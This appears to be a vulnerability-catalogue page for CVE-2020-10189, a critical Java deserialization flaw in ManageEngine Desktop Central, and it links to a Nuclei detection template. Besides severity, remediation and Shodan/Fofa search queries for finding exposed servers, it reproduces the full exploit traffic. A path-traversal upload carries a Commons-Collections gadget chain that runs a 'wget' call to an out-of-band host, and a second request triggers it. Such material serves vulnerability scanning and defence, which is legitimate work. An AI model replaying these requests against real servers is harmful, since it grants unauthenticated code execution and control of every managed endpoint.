| Title | ManageEngine Desktop Central Java Deserialization |
|---|---|
| Author | king-alexander |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute arbitrary code on Zoho ManageEngine Desktop Central servers, leading to complete system compromise and access to all managed endpoints. |
| Remediation | Upgrade to ManageEngine Desktop Central Build 10.0.474 or later. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94248 |
| CVE ID | CVE-2020-10189 |
| CWE ID | CWE-502 |
| Shodan Query | http.title:"manageengine desktop central 10" |
| Fofa Query | body="manageengine desktop central 10"title="manageengine desktop central 10"app="zoho-manageengine-desktop" |
| Tags | cve cve2020 kev zoho manageengine deserialization intrusive vkev vuln |
Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution.
POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.17
Connection: close
Content-Length: 1363
Content-Type: application/octet-stream
Accept-Encoding: gzip
�� sr java.util.HashSet�D�����4 xpw ?@ sr 4org.apache.commons.collections.keyvalue.TiedMapEntry��қ9�� L keyt Ljava/lang/Object;L mapt Ljava/util/Map;xpt &https://github.com/joaomatosf/jexboss sr *org.apache.commons.collections.map.LazyMapn唂�y� L factoryt ,Lorg/apache/commons/collections/Transformer;xpsr :org.apache.commons.collections.functors.ChainedTransformer0Ǘ�(z� [
iTransformerst -[Lorg/apache/commons/collections/Transformer;xpur -[Lorg.apache.commons.collections.Transformer;�V*��4� xp sr ;org.apache.commons.collections.functors.ConstantTransformerXv�A�� L iConstantq ~ xpvr java.lang.Runtime xpsr :org.apache.commons.collections.functors.InvokerTransformer���k{|�8 [ iArgst [Ljava/lang/Object;L iMethodNamet Ljava/lang/String;[ iParamTypest [Ljava/lang/Class;xpur [Ljava.lang.Object;��X�s)l xp t
getRuntimeur [Ljava.lang.Class;���Z� xp t getMethoduq ~ vr java.lang.String��8z;�B xpvq ~ sq ~ uq ~ puq ~ t invokeuq ~ vr java.lang.Object xpvq ~ sq ~ ur [Ljava.lang.String;��V��{G xp t 7wget http://d5jodbhle0o2694d5tc0ezogxedkywyot.oast.sitet execuq ~ q ~ sq ~ sr java.lang.Integer⠤���8 I valuexr java.lang.Number������ xp sr java.util.HashMap���`� F
loadFactorI thresholdxp?@ w xxx
GET /cewolf/?img=%5Clogger.zip HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-10189.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-10189.pcap
N/AN/A